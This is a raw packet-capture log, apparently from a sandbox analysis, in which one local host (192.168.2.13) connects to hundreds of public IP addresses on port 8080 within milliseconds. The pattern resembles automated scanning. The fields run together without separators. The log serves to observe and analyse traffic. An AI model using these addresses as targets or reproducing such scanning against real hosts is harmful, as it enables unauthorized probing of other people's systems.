                                              Nov 23, 2023 05:14:50.630000114 CET542028080192.168.2.1385.212.51.20
                                              Nov 23, 2023 05:14:50.630003929 CET542028080192.168.2.1385.202.241.97
                                              Nov 23, 2023 05:14:50.630027056 CET542028080192.168.2.1385.195.229.201
                                              Nov 23, 2023 05:14:50.630027056 CET542028080192.168.2.1385.231.123.36
                                              Nov 23, 2023 05:14:50.630029917 CET542028080192.168.2.1395.21.105.148
                                              Nov 23, 2023 05:14:50.630029917 CET542028080192.168.2.1394.151.104.209
                                              Nov 23, 2023 05:14:50.630029917 CET542028080192.168.2.1331.40.150.106
                                              Nov 23, 2023 05:14:50.630031109 CET542028080192.168.2.1362.162.140.138
                                              Nov 23, 2023 05:14:50.630031109 CET542028080192.168.2.1331.182.76.154
                                              Nov 23, 2023 05:14:50.630043983 CET542028080192.168.2.1331.55.244.141
                                              Nov 23, 2023 05:14:50.630053043 CET542028080192.168.2.1362.223.196.0
                                              Nov 23, 2023 05:14:50.630058050 CET542028080192.168.2.1394.43.225.172
                                              Nov 23, 2023 05:14:50.630062103 CET542028080192.168.2.1362.240.148.154
                                              Nov 23, 2023 05:14:50.630069017 CET542028080192.168.2.1385.143.166.248
                                              Nov 23, 2023 05:14:50.630079031 CET542028080192.168.2.1362.253.229.154
                                              Nov 23, 2023 05:14:50.630086899 CET542028080192.168.2.1394.91.204.36
                                              Nov 23, 2023 05:14:50.630095005 CET542028080192.168.2.1395.115.215.119
                                              Nov 23, 2023 05:14:50.630101919 CET542028080192.168.2.1394.233.127.42
                                              Nov 23, 2023 05:14:50.630109072 CET542028080192.168.2.1331.95.48.108
                                              Nov 23, 2023 05:14:50.630120993 CET542028080192.168.2.1331.131.32.146
                                              Nov 23, 2023 05:14:50.630125999 CET542028080192.168.2.1395.105.53.106
                                              Nov 23, 2023 05:14:50.630125999 CET542028080192.168.2.1395.124.228.186
                                              Nov 23, 2023 05:14:50.630131960 CET542028080192.168.2.1331.24.102.112
                                              Nov 23, 2023 05:14:50.630146027 CET542028080192.168.2.1394.172.219.152
                                              Nov 23, 2023 05:14:50.630146980 CET542028080192.168.2.1331.187.212.158
                                              Nov 23, 2023 05:14:50.630161047 CET542028080192.168.2.1385.36.185.242
                                              Nov 23, 2023 05:14:50.630162954 CET542028080192.168.2.1331.153.196.174
                                              Nov 23, 2023 05:14:50.630170107 CET542028080192.168.2.1362.87.5.17
                                              Nov 23, 2023 05:14:50.630182028 CET542028080192.168.2.1395.243.220.160
                                              Nov 23, 2023 05:14:50.630187035 CET542028080192.168.2.1362.88.47.121
                                              Nov 23, 2023 05:14:50.630192995 CET542028080192.168.2.1395.197.164.28
                                              Nov 23, 2023 05:14:50.630204916 CET542028080192.168.2.1331.177.90.176
                                              Nov 23, 2023 05:14:50.630207062 CET542028080192.168.2.1385.3.251.76
                                              Nov 23, 2023 05:14:50.630208015 CET542028080192.168.2.1395.45.119.80
                                              Nov 23, 2023 05:14:50.630212069 CET542028080192.168.2.1331.144.64.43
                                              Nov 23, 2023 05:14:50.630225897 CET542028080192.168.2.1331.84.169.71
                                              Nov 23, 2023 05:14:50.630225897 CET542028080192.168.2.1362.15.2.176
                                              Nov 23, 2023 05:14:50.630225897 CET542028080192.168.2.1385.10.49.130
                                              Nov 23, 2023 05:14:50.630228043 CET542028080192.168.2.1394.99.227.106
                                              Nov 23, 2023 05:14:50.630234003 CET542028080192.168.2.1331.140.13.131
                                              Nov 23, 2023 05:14:50.630247116 CET542028080192.168.2.1394.31.146.172
                                              Nov 23, 2023 05:14:50.630247116 CET542028080192.168.2.1331.178.112.233
                                              Nov 23, 2023 05:14:50.630258083 CET542028080192.168.2.1385.237.116.168
                                              Nov 23, 2023 05:14:50.630263090 CET542028080192.168.2.1362.51.183.233
                                              Nov 23, 2023 05:14:50.630271912 CET542028080192.168.2.1362.79.102.168
                                              Nov 23, 2023 05:14:50.630281925 CET542028080192.168.2.1395.138.58.116
                                              Nov 23, 2023 05:14:50.630291939 CET542028080192.168.2.1395.154.131.113
                                              Nov 23, 2023 05:14:50.630291939 CET542028080192.168.2.1331.80.171.224
                                              Nov 23, 2023 05:14:50.630292892 CET542028080192.168.2.1395.235.227.38
                                              Nov 23, 2023 05:14:50.630292892 CET542028080192.168.2.1394.90.116.104
                                              Nov 23, 2023 05:14:50.630301952 CET542028080192.168.2.1385.113.40.69
                                              Nov 23, 2023 05:14:50.630315065 CET542028080192.168.2.1394.21.146.111
                                              Nov 23, 2023 05:14:50.630316973 CET542028080192.168.2.1331.215.64.85
                                              Nov 23, 2023 05:14:50.630317926 CET542028080192.168.2.1395.45.236.225
                                              Nov 23, 2023 05:14:50.630319118 CET542028080192.168.2.1385.19.119.86
                                              Nov 23, 2023 05:14:50.630331039 CET542028080192.168.2.1331.66.38.54
                                              Nov 23, 2023 05:14:50.630337954 CET542028080192.168.2.1331.147.193.189
                                              Nov 23, 2023 05:14:50.630342007 CET542028080192.168.2.1362.191.91.105
                                              Nov 23, 2023 05:14:50.630347967 CET542028080192.168.2.1362.75.181.76
                                              Nov 23, 2023 05:14:50.630357027 CET542028080192.168.2.1394.105.79.81
                                              Nov 23, 2023 05:14:50.630372047 CET542028080192.168.2.1394.164.84.12
                                              Nov 23, 2023 05:14:50.630372047 CET542028080192.168.2.1385.187.26.144
                                              Nov 23, 2023 05:14:50.630397081 CET542028080192.168.2.1362.114.184.184
                                              Nov 23, 2023 05:14:50.630399942 CET542028080192.168.2.1395.168.69.200
                                              Nov 23, 2023 05:14:50.630403042 CET542028080192.168.2.1362.163.125.249
                                              Nov 23, 2023 05:14:50.630410910 CET542028080192.168.2.1394.102.47.27
                                              Nov 23, 2023 05:14:50.630420923 CET542028080192.168.2.1394.92.185.145
                                              Nov 23, 2023 05:14:50.630420923 CET542028080192.168.2.1362.62.56.197
                                              Nov 23, 2023 05:14:50.630429029 CET542028080192.168.2.1395.223.144.193
                                              Nov 23, 2023 05:14:50.630429029 CET542028080192.168.2.1385.115.79.197
                                              Nov 23, 2023 05:14:50.630443096 CET542028080192.168.2.1362.199.149.136
                                              Nov 23, 2023 05:14:50.630449057 CET542028080192.168.2.1395.186.153.13
                                              Nov 23, 2023 05:14:50.630456924 CET542028080192.168.2.1362.22.125.40
                                              Nov 23, 2023 05:14:50.630461931 CET542028080192.168.2.1394.34.247.202
                                              Nov 23, 2023 05:14:50.630465984 CET542028080192.168.2.1385.108.25.158
                                              Nov 23, 2023 05:14:50.630470037 CET542028080192.168.2.1331.53.200.19
                                              Nov 23, 2023 05:14:50.630485058 CET542028080192.168.2.1395.246.21.34
                                              Nov 23, 2023 05:14:50.630485058 CET542028080192.168.2.1385.189.212.77
                                              Nov 23, 2023 05:14:50.630486965 CET542028080192.168.2.1362.207.238.151
                                              Nov 23, 2023 05:14:50.630501032 CET542028080192.168.2.1362.139.202.85
                                              Nov 23, 2023 05:14:50.630506039 CET542028080192.168.2.1331.14.155.71
                                              Nov 23, 2023 05:14:50.630507946 CET542028080192.168.2.1331.34.78.111
                                              Nov 23, 2023 05:14:50.630507946 CET542028080192.168.2.1394.24.249.129
                                              Nov 23, 2023 05:14:50.630517960 CET542028080192.168.2.1362.13.201.76
                                              Nov 23, 2023 05:14:50.630518913 CET542028080192.168.2.1362.133.76.60
                                              Nov 23, 2023 05:14:50.630521059 CET542028080192.168.2.1394.107.63.35
                                              Nov 23, 2023 05:14:50.630521059 CET542028080192.168.2.1362.195.63.60
                                              Nov 23, 2023 05:14:50.630528927 CET542028080192.168.2.1395.82.56.234
                                              Nov 23, 2023 05:14:50.630531073 CET542028080192.168.2.1394.182.0.197
                                              Nov 23, 2023 05:14:50.630531073 CET542028080192.168.2.1385.84.217.254
                                              Nov 23, 2023 05:14:50.630531073 CET542028080192.168.2.1385.86.16.112
                                              Nov 23, 2023 05:14:50.630537033 CET542028080192.168.2.1395.160.162.27
                                              Nov 23, 2023 05:14:50.630542994 CET542028080192.168.2.1331.195.220.199
                                              Nov 23, 2023 05:14:50.630554914 CET542028080192.168.2.1331.118.227.186
                                              Nov 23, 2023 05:14:50.630561113 CET542028080192.168.2.1362.20.221.158
                                              Nov 23, 2023 05:14:50.630564928 CET542028080192.168.2.1395.20.187.12
                                              Nov 23, 2023 05:14:50.630578041 CET542028080192.168.2.1331.167.237.164
                                              Nov 23, 2023 05:14:50.630578995 CET542028080192.168.2.1331.43.226.237
                                              Nov 23, 2023 05:14:50.630578995 CET542028080192.168.2.1395.63.65.168
                                              Nov 23, 2023 05:14:50.630587101 CET542028080192.168.2.1394.112.138.61
                                              Nov 23, 2023 05:14:50.630594969 CET542028080192.168.2.1385.129.149.249
                                              Nov 23, 2023 05:14:50.630599976 CET542028080192.168.2.1395.248.133.172
                                              Nov 23, 2023 05:14:50.630604982 CET542028080192.168.2.1394.174.214.162
                                              Nov 23, 2023 05:14:50.630604982 CET542028080192.168.2.1394.10.32.249
                                              Nov 23, 2023 05:14:50.630606890 CET542028080192.168.2.1331.208.46.255
                                              Nov 23, 2023 05:14:50.630616903 CET542028080192.168.2.1362.217.195.84
                                              Nov 23, 2023 05:14:50.630628109 CET542028080192.168.2.1394.18.198.227
                                              Nov 23, 2023 05:14:50.630635977 CET542028080192.168.2.1385.48.248.101
                                              Nov 23, 2023 05:14:50.630640030 CET542028080192.168.2.1394.6.9.207
                                              Nov 23, 2023 05:14:50.630654097 CET542028080192.168.2.1395.71.181.137
                                              Nov 23, 2023 05:14:50.630659103 CET542028080192.168.2.1395.191.131.62
                                              Nov 23, 2023 05:14:50.630659103 CET542028080192.168.2.1395.145.221.66
                                              Nov 23, 2023 05:14:50.630676985 CET542028080192.168.2.1362.142.169.62
                                              Nov 23, 2023 05:14:50.630676985 CET542028080192.168.2.1385.146.62.179
                                              Nov 23, 2023 05:14:50.630681992 CET542028080192.168.2.1385.9.229.76
                                              Nov 23, 2023 05:14:50.630696058 CET542028080192.168.2.1362.185.251.110
                                              Nov 23, 2023 05:14:50.630698919 CET542028080192.168.2.1362.12.119.161
                                              Nov 23, 2023 05:14:50.630703926 CET542028080192.168.2.1331.196.243.54
                                              Nov 23, 2023 05:14:50.630703926 CET542028080192.168.2.1362.195.121.53
                                              Nov 23, 2023 05:14:50.630724907 CET477008080192.168.2.1395.86.82.175
                                              Nov 23, 2023 05:14:50.630729914 CET361548080192.168.2.1331.136.47.50
                                              Nov 23, 2023 05:14:50.630744934 CET542028080192.168.2.1394.89.205.230
                                              Nov 23, 2023 05:14:50.630747080 CET542028080192.168.2.1385.137.169.113
                                              Nov 23, 2023 05:14:50.630750895 CET542028080192.168.2.1331.162.97.132
                                              Nov 23, 2023 05:14:50.630759001 CET542028080192.168.2.1394.209.222.181
                                              Nov 23, 2023 05:14:50.630760908 CET542028080192.168.2.1395.85.224.255
                                              Nov 23, 2023 05:14:50.630768061 CET542028080192.168.2.1394.154.93.140
                                              Nov 23, 2023 05:14:50.630779982 CET542028080192.168.2.1362.230.191.33
                                              Nov 23, 2023 05:14:50.630779982 CET542028080192.168.2.1362.36.155.82
                                              Nov 23, 2023 05:14:50.630790949 CET542028080192.168.2.1385.36.141.51
                                              Nov 23, 2023 05:14:50.630796909 CET542028080192.168.2.1331.237.102.48
                                              Nov 23, 2023 05:14:50.630800009 CET542028080192.168.2.1394.181.192.83
                                              Nov 23, 2023 05:14:50.630811930 CET542028080192.168.2.1394.12.125.110
                                              Nov 23, 2023 05:14:50.630815029 CET542028080192.168.2.1362.2.44.191
                                              Nov 23, 2023 05:14:50.630817890 CET542028080192.168.2.1395.141.91.232
                                              Nov 23, 2023 05:14:50.630830050 CET542028080192.168.2.1331.226.193.106
                                              Nov 23, 2023 05:14:50.630835056 CET542028080192.168.2.1385.33.162.59
                                              Nov 23, 2023 05:14:50.630836964 CET542028080192.168.2.1385.151.194.225
                                              Nov 23, 2023 05:14:50.630847931 CET542028080192.168.2.1385.51.183.195
                                              Nov 23, 2023 05:14:50.630853891 CET542028080192.168.2.1362.209.92.15
                                              Nov 23, 2023 05:14:50.630856037 CET542028080192.168.2.1394.30.45.111
                                              Nov 23, 2023 05:14:50.630863905 CET542028080192.168.2.1362.52.176.119
                                              Nov 23, 2023 05:14:50.630871058 CET542028080192.168.2.1385.238.77.121
                                              Nov 23, 2023 05:14:50.630883932 CET542028080192.168.2.1395.44.111.71
                                              Nov 23, 2023 05:14:50.630887032 CET542028080192.168.2.1394.139.199.91
                                              Nov 23, 2023 05:14:50.630896091 CET542028080192.168.2.1394.246.54.146
                                              Nov 23, 2023 05:14:50.630896091 CET542028080192.168.2.1385.76.199.222
                                              Nov 23, 2023 05:14:50.630906105 CET542028080192.168.2.1362.136.116.109
                                              Nov 23, 2023 05:14:50.630918980 CET542028080192.168.2.1385.39.54.235
                                              Nov 23, 2023 05:14:50.630928040 CET542028080192.168.2.1394.120.164.225
                                              Nov 23, 2023 05:14:50.630928040 CET542028080192.168.2.1394.216.127.236
                                              Nov 23, 2023 05:14:50.630928993 CET542028080192.168.2.1395.211.121.242
                                              Nov 23, 2023 05:14:50.630928993 CET542028080192.168.2.1362.118.84.52
                                              Nov 23, 2023 05:14:50.630939960 CET542028080192.168.2.1385.212.218.208
                                              Nov 23, 2023 05:14:50.630945921 CET542028080192.168.2.1385.119.53.117
                                              Nov 23, 2023 05:14:50.630959034 CET542028080192.168.2.1331.187.212.60
                                              Nov 23, 2023 05:14:50.630960941 CET542028080192.168.2.1362.214.93.60
                                              Nov 23, 2023 05:14:50.630966902 CET542028080192.168.2.1394.205.43.90
                                              Nov 23, 2023 05:14:50.630968094 CET542028080192.168.2.1385.165.7.222
                                              Nov 23, 2023 05:14:50.630968094 CET542028080192.168.2.1394.218.211.46
                                              Nov 23, 2023 05:14:50.630981922 CET542028080192.168.2.1385.218.168.42
                                              Nov 23, 2023 05:14:50.630983114 CET542028080192.168.2.1331.45.190.122
                                              Nov 23, 2023 05:14:50.630985975 CET542028080192.168.2.1362.155.128.248
                                              Nov 23, 2023 05:14:50.630990982 CET542028080192.168.2.1362.104.52.36
                                              Nov 23, 2023 05:14:50.631000042 CET542028080192.168.2.1395.0.171.229
                                              Nov 23, 2023 05:14:50.631004095 CET542028080192.168.2.1362.243.36.171
                                              Nov 23, 2023 05:14:50.631010056 CET542028080192.168.2.1395.89.31.102
                                              Nov 23, 2023 05:14:50.631011009 CET542028080192.168.2.1385.202.60.77
                                              Nov 23, 2023 05:14:50.631014109 CET542028080192.168.2.1331.248.225.72
                                              Nov 23, 2023 05:14:50.631017923 CET542028080192.168.2.1385.165.225.70
                                              Nov 23, 2023 05:14:50.631017923 CET542028080192.168.2.1394.186.76.144
                                              Nov 23, 2023 05:14:50.631040096 CET542028080192.168.2.1385.83.134.35
                                              Nov 23, 2023 05:14:50.631040096 CET542028080192.168.2.1331.214.158.5
                                              Nov 23, 2023 05:14:50.631046057 CET542028080192.168.2.1362.62.9.122
                                              Nov 23, 2023 05:14:50.631047964 CET542028080192.168.2.1331.182.241.156
                                              Nov 23, 2023 05:14:50.631047964 CET542028080192.168.2.1362.36.193.164
                                              Nov 23, 2023 05:14:50.631048918 CET542028080192.168.2.1331.10.14.38
                                              Nov 23, 2023 05:14:50.631057024 CET542028080192.168.2.1362.199.77.48
                                              Nov 23, 2023 05:14:50.631057024 CET542028080192.168.2.1331.244.16.68
                                              Nov 23, 2023 05:14:50.631062984 CET542028080192.168.2.1362.239.227.136
                                              Nov 23, 2023 05:14:50.631069899 CET542028080192.168.2.1395.101.141.168
                                              Nov 23, 2023 05:14:50.631072044 CET542028080192.168.2.1362.114.229.157
                                              Nov 23, 2023 05:14:50.631076097 CET542028080192.168.2.1395.131.145.133
                                              Nov 23, 2023 05:14:50.631086111 CET542028080192.168.2.1394.93.69.53
                                              Nov 23, 2023 05:14:50.631089926 CET542028080192.168.2.1331.28.205.238
                                              Nov 23, 2023 05:14:50.631093025 CET542028080192.168.2.1395.119.175.114
                                              Nov 23, 2023 05:14:50.631109953 CET542028080192.168.2.1362.19.213.123
                                              Nov 23, 2023 05:14:50.631109953 CET542028080192.168.2.1385.34.134.54
                                              Nov 23, 2023 05:14:50.631112099 CET542028080192.168.2.1362.4.97.245
                                              Nov 23, 2023 05:14:50.631113052 CET542028080192.168.2.1362.77.0.237
                                              Nov 23, 2023 05:14:50.631112099 CET542028080192.168.2.1362.105.249.203
                                              Nov 23, 2023 05:14:50.631128073 CET542028080192.168.2.1394.17.45.68
                                              Nov 23, 2023 05:14:50.631129026 CET542028080192.168.2.1395.24.27.255
                                              Nov 23, 2023 05:14:50.631148100 CET542028080192.168.2.1385.169.147.204
                                              Nov 23, 2023 05:14:50.631159067 CET542028080192.168.2.1362.99.221.109
                                              Nov 23, 2023 05:14:50.631162882 CET542028080192.168.2.1362.116.162.59
                                              Nov 23, 2023 05:14:50.631162882 CET542028080192.168.2.1362.26.166.104
                                              Nov 23, 2023 05:14:50.631166935 CET542028080192.168.2.1331.20.127.22
                                              Nov 23, 2023 05:14:50.631166935 CET542028080192.168.2.1394.208.88.68
                                              Nov 23, 2023 05:14:50.631179094 CET542028080192.168.2.1394.2.51.64
                                              Nov 23, 2023 05:14:50.631190062 CET542028080192.168.2.1362.34.26.244
                                              Nov 23, 2023 05:14:50.631197929 CET542028080192.168.2.1394.48.69.216
                                              Nov 23, 2023 05:14:50.631197929 CET542028080192.168.2.1395.161.125.185
                                              Nov 23, 2023 05:14:50.631197929 CET542028080192.168.2.1331.61.86.241
                                              Nov 23, 2023 05:14:50.631211996 CET542028080192.168.2.1394.222.89.135
                                              Nov 23, 2023 05:14:50.631217957 CET542028080192.168.2.1385.230.251.255
                                              Nov 23, 2023 05:14:50.631228924 CET542028080192.168.2.1395.51.236.247
                                              Nov 23, 2023 05:14:50.631237030 CET542028080192.168.2.1331.145.33.6
                                              Nov 23, 2023 05:14:50.631247044 CET542028080192.168.2.1395.190.130.218
                                              Nov 23, 2023 05:14:50.631258965 CET542028080192.168.2.1395.237.217.141
                                              Nov 23, 2023 05:14:50.631262064 CET542028080192.168.2.1362.230.10.42
                                              Nov 23, 2023 05:14:50.631273985 CET542028080192.168.2.1362.246.249.27
                                              Nov 23, 2023 05:14:50.631279945 CET542028080192.168.2.1362.81.229.59
                                              Nov 23, 2023 05:14:50.631283045 CET542028080192.168.2.1362.4.240.205
                                              Nov 23, 2023 05:14:50.631294966 CET542028080192.168.2.1362.143.21.173
                                              Nov 23, 2023 05:14:50.631302118 CET542028080192.168.2.1395.191.151.181
                                              Nov 23, 2023 05:14:50.631304026 CET542028080192.168.2.1385.23.6.255
                                              Nov 23, 2023 05:14:50.631314993 CET542028080192.168.2.1394.129.53.215
                                              Nov 23, 2023 05:14:50.631314993 CET542028080192.168.2.1385.13.46.82
                                              Nov 23, 2023 05:14:50.631330967 CET542028080192.168.2.1395.225.212.148
                                              Nov 23, 2023 05:14:50.631331921 CET542028080192.168.2.1362.0.178.197
                                              Nov 23, 2023 05:14:50.631335020 CET542028080192.168.2.1331.191.198.200
                                              Nov 23, 2023 05:14:50.631341934 CET542028080192.168.2.1362.154.140.228
                                              Nov 23, 2023 05:14:50.631359100 CET542028080192.168.2.1331.108.19.200
                                              Nov 23, 2023 05:14:50.631360054 CET542028080192.168.2.1385.192.78.175
                                              Nov 23, 2023 05:14:50.631360054 CET542028080192.168.2.1394.18.5.99
                                              Nov 23, 2023 05:14:50.631362915 CET542028080192.168.2.1395.135.141.13
                                              Nov 23, 2023 05:14:50.631367922 CET542028080192.168.2.1394.253.189.107
                                              Nov 23, 2023 05:14:50.631372929 CET542028080192.168.2.1394.35.176.61
                                              Nov 23, 2023 05:14:50.631383896 CET542028080192.168.2.1331.32.250.223
                                              Nov 23, 2023 05:14:50.631392002 CET542028080192.168.2.1331.240.21.81
                                              Nov 23, 2023 05:14:50.631392002 CET542028080192.168.2.1331.70.28.117
                                              Nov 23, 2023 05:14:50.631392956 CET542028080192.168.2.1395.61.198.134
                                              Nov 23, 2023 05:14:50.631392956 CET542028080192.168.2.1394.209.136.32
                                              Nov 23, 2023 05:14:50.631397009 CET542028080192.168.2.1395.237.64.33
                                              Nov 23, 2023 05:14:50.631406069 CET542028080192.168.2.1394.102.125.105
                                              Nov 23, 2023 05:14:50.631409883 CET542028080192.168.2.1385.164.194.43
                                              Nov 23, 2023 05:14:50.631417036 CET542028080192.168.2.1395.15.217.71
                                              Nov 23, 2023 05:14:50.631436110 CET542028080192.168.2.1394.215.165.118
                                              Nov 23, 2023 05:14:50.631436110 CET542028080192.168.2.1331.137.193.93
                                              Nov 23, 2023 05:14:50.631447077 CET542028080192.168.2.1362.96.135.80
                                              Nov 23, 2023 05:14:50.631449938 CET542028080192.168.2.1395.90.35.75
                                              Nov 23, 2023 05:14:50.631460905 CET542028080192.168.2.1395.236.212.170
                                              Nov 23, 2023 05:14:50.631464005 CET542028080192.168.2.1331.200.37.211
                                              Nov 23, 2023 05:14:50.631472111 CET542028080192.168.2.1385.237.168.144
                                              Nov 23, 2023 05:14:50.631485939 CET542028080192.168.2.1331.254.119.240
                                              Nov 23, 2023 05:14:50.631493092 CET542028080192.168.2.1331.254.243.198
                                              Nov 23, 2023 05:14:50.631494045 CET542028080192.168.2.1331.232.224.31
                                              Nov 23, 2023 05:14:50.631498098 CET542028080192.168.2.1362.163.86.117
                                              Nov 23, 2023 05:14:50.631500959 CET542028080192.168.2.1362.149.108.142
                                              Nov 23, 2023 05:14:50.631508112 CET542028080192.168.2.1331.12.41.32
                                              Nov 23, 2023 05:14:50.631514072 CET542028080192.168.2.1331.164.154.247
                                              Nov 23, 2023 05:14:50.631517887 CET542028080192.168.2.1362.113.12.26
                                              Nov 23, 2023 05:14:50.631530046 CET542028080192.168.2.1395.165.107.180
                                              Nov 23, 2023 05:14:50.631531954 CET542028080192.168.2.1362.206.178.198
                                              Nov 23, 2023 05:14:50.631540060 CET542028080192.168.2.1394.207.235.3
                                              Nov 23, 2023 05:14:50.631546021 CET542028080192.168.2.1395.22.212.159
                                              Nov 23, 2023 05:14:50.631561995 CET542028080192.168.2.1395.206.31.3
                                              Nov 23, 2023 05:14:50.631562948 CET542028080192.168.2.1331.192.36.204
                                              Nov 23, 2023 05:14:50.631562948 CET542028080192.168.2.1394.94.253.238
                                              Nov 23, 2023 05:14:50.631566048 CET542028080192.168.2.1395.205.97.4
                                              Nov 23, 2023 05:14:50.631572008 CET542028080192.168.2.1385.222.70.70
                                              Nov 23, 2023 05:14:50.631581068 CET542028080192.168.2.1385.179.93.243
                                              Nov 23, 2023 05:14:50.631586075 CET542028080192.168.2.1395.175.66.148
                                              Nov 23, 2023 05:14:50.631598949 CET542028080192.168.2.1385.169.202.176
                                              Nov 23, 2023 05:14:50.631598949 CET542028080192.168.2.1331.219.109.249
                                              Nov 23, 2023 05:14:50.631608009 CET542028080192.168.2.1362.218.232.18
                                              Nov 23, 2023 05:14:50.631614923 CET542028080192.168.2.1395.182.91.102
                                              Nov 23, 2023 05:14:50.631617069 CET542028080192.168.2.1331.132.202.161
                                              Nov 23, 2023 05:14:50.631632090 CET542028080192.168.2.1394.199.23.60
                                              Nov 23, 2023 05:14:50.631634951 CET542028080192.168.2.1385.255.253.154
                                              Nov 23, 2023 05:14:50.631638050 CET542028080192.168.2.1395.193.235.18
                                              Nov 23, 2023 05:14:50.631639004 CET542028080192.168.2.1395.234.183.30
                                              Nov 23, 2023 05:14:50.631645918 CET542028080192.168.2.1395.155.43.192
                                              Nov 23, 2023 05:14:50.631653070 CET542028080192.168.2.1385.241.189.184
                                              Nov 23, 2023 05:14:50.631655931 CET542028080192.168.2.1362.242.26.58
                                              Nov 23, 2023 05:14:50.631671906 CET542028080192.168.2.1331.90.164.181
                                              Nov 23, 2023 05:14:50.631671906 CET542028080192.168.2.1362.46.42.70
                                              Nov 23, 2023 05:14:50.631683111 CET542028080192.168.2.1394.248.159.73
                                              Nov 23, 2023 05:14:50.631697893 CET542028080192.168.2.1385.10.193.137
                                              Nov 23, 2023 05:14:50.631704092 CET542028080192.168.2.1385.193.128.25
                                              Nov 23, 2023 05:14:50.631719112 CET542028080192.168.2.1385.32.206.118
                                              Nov 23, 2023 05:14:50.631721973 CET542028080192.168.2.1331.74.76.152
                                              Nov 23, 2023 05:14:50.631736040 CET542028080192.168.2.1394.95.182.186
                                              Nov 23, 2023 05:14:50.631751060 CET542028080192.168.2.1394.153.141.5
                                              Nov 23, 2023 05:14:50.631755114 CET542028080192.168.2.1394.193.76.218
                                              Nov 23, 2023 05:14:50.631756067 CET542028080192.168.2.1394.134.62.207
                                              Nov 23, 2023 05:14:50.631757975 CET542028080192.168.2.1395.253.69.22
                                              Nov 23, 2023 05:14:50.631764889 CET542028080192.168.2.1362.84.213.129
                                              Nov 23, 2023 05:14:50.631767035 CET542028080192.168.2.1331.53.145.204
                                              Nov 23, 2023 05:14:50.631784916 CET542028080192.168.2.1362.148.77.105
                                              Nov 23, 2023 05:14:50.631788969 CET542028080192.168.2.1385.213.176.232
                                              Nov 23, 2023 05:14:50.631795883 CET542028080192.168.2.1385.90.219.252
                                              Nov 23, 2023 05:14:50.631804943 CET542028080192.168.2.1394.120.225.23
                                              Nov 23, 2023 05:14:50.631819010 CET542028080192.168.2.1331.159.135.194
                                              Nov 23, 2023 05:14:50.631819010 CET542028080192.168.2.1385.219.149.230
                                              Nov 23, 2023 05:14:50.631819963 CET542028080192.168.2.1395.180.127.36
                                              Nov 23, 2023 05:14:50.631819963 CET542028080192.168.2.1385.47.175.119
                                              Nov 23, 2023 05:14:50.631819963 CET542028080192.168.2.1395.246.129.4
                                              Nov 23, 2023 05:14:50.631839991 CET542028080192.168.2.1362.103.27.85
                                              Nov 23, 2023 05:14:50.631840944 CET542028080192.168.2.1331.82.187.126
                                              Nov 23, 2023 05:14:50.631840944 CET542028080192.168.2.1395.217.6.240
                                              Nov 23, 2023 05:14:50.631858110 CET542028080192.168.2.1331.119.225.44
                                              Nov 23, 2023 05:14:50.631858110 CET542028080192.168.2.1394.92.203.100
                                              Nov 23, 2023 05:14:50.631861925 CET542028080192.168.2.1395.177.20.92
                                              Nov 23, 2023 05:14:50.631865978 CET542028080192.168.2.1362.142.70.237
                                              Nov 23, 2023 05:14:50.631870985 CET542028080192.168.2.1331.39.166.16
                                              Nov 23, 2023 05:14:50.631877899 CET542028080192.168.2.1362.129.15.139
                                              Nov 23, 2023 05:14:50.631889105 CET542028080192.168.2.1331.15.254.82
                                              Nov 23, 2023 05:14:50.631896973 CET542028080192.168.2.1385.119.35.223
                                              Nov 23, 2023 05:14:50.631911993 CET542028080192.168.2.1362.118.174.41
                                              Nov 23, 2023 05:14:50.631912947 CET542028080192.168.2.1331.165.58.20
                                              Nov 23, 2023 05:14:50.631911993 CET542028080192.168.2.1385.67.8.152
                                              Nov 23, 2023 05:14:50.631917000 CET542028080192.168.2.1362.20.11.158
                                              Nov 23, 2023 05:14:50.631930113 CET542028080192.168.2.1385.86.8.209
                                              Nov 23, 2023 05:14:50.631932974 CET542028080192.168.2.1362.53.164.2
                                              Nov 23, 2023 05:14:50.631938934 CET542028080192.168.2.1385.87.110.43
                                              Nov 23, 2023 05:14:50.631944895 CET542028080192.168.2.1385.227.66.18
                                              Nov 23, 2023 05:14:50.631947041 CET542028080192.168.2.1385.7.111.192
                                              Nov 23, 2023 05:14:50.631963015 CET542028080192.168.2.1394.205.117.52
                                              Nov 23, 2023 05:14:50.631964922 CET542028080192.168.2.1385.114.19.244
                                              Nov 23, 2023 05:14:50.631964922 CET542028080192.168.2.1394.42.143.194
                                              Nov 23, 2023 05:14:50.631978035 CET542028080192.168.2.1394.12.193.72
                                              Nov 23, 2023 05:14:50.631979942 CET542028080192.168.2.1362.254.60.255
                                              Nov 23, 2023 05:14:50.631989002 CET542028080192.168.2.1331.68.190.94
                                              Nov 23, 2023 05:14:50.631989002 CET542028080192.168.2.1331.84.220.236
                                              Nov 23, 2023 05:14:50.632004023 CET542028080192.168.2.1395.163.251.36
                                              Nov 23, 2023 05:14:50.632009983 CET542028080192.168.2.1395.14.174.125
                                              Nov 23, 2023 05:14:50.632014990 CET542028080192.168.2.1331.47.111.201
                                              Nov 23, 2023 05:14:50.632028103 CET542028080192.168.2.1331.115.236.142
                                              Nov 23, 2023 05:14:50.632029057 CET542028080192.168.2.1395.106.40.174
                                              Nov 23, 2023 05:14:50.632034063 CET542028080192.168.2.1362.230.207.59
                                              Nov 23, 2023 05:14:50.632034063 CET542028080192.168.2.1362.51.243.142
                                              Nov 23, 2023 05:14:50.632044077 CET542028080192.168.2.1362.47.220.146
                                              Nov 23, 2023 05:14:50.632052898 CET542028080192.168.2.1385.173.4.236
                                              Nov 23, 2023 05:14:50.632066011 CET542028080192.168.2.1362.2.141.15
                                              Nov 23, 2023 05:14:50.632076025 CET542028080192.168.2.1331.92.249.112
                                              Nov 23, 2023 05:14:50.632080078 CET542028080192.168.2.1362.65.98.197
                                              Nov 23, 2023 05:14:50.632082939 CET542028080192.168.2.1385.144.248.82
                                              Nov 23, 2023 05:14:50.632086039 CET542028080192.168.2.1362.203.98.142
                                              Nov 23, 2023 05:14:50.632097960 CET542028080192.168.2.1394.98.163.0
                                              Nov 23, 2023 05:14:50.632102013 CET542028080192.168.2.1395.107.252.119
                                              Nov 23, 2023 05:14:50.632102966 CET542028080192.168.2.1331.199.213.201
                                              Nov 23, 2023 05:14:50.632119894 CET542028080192.168.2.1362.159.11.51
                                              Nov 23, 2023 05:14:50.632119894 CET542028080192.168.2.1394.244.191.247
                                              Nov 23, 2023 05:14:50.632123947 CET542028080192.168.2.1331.90.139.17
                                              Nov 23, 2023 05:14:50.632123947 CET542028080192.168.2.1331.121.113.24
                                              Nov 23, 2023 05:14:50.632129908 CET542028080192.168.2.1385.92.123.164
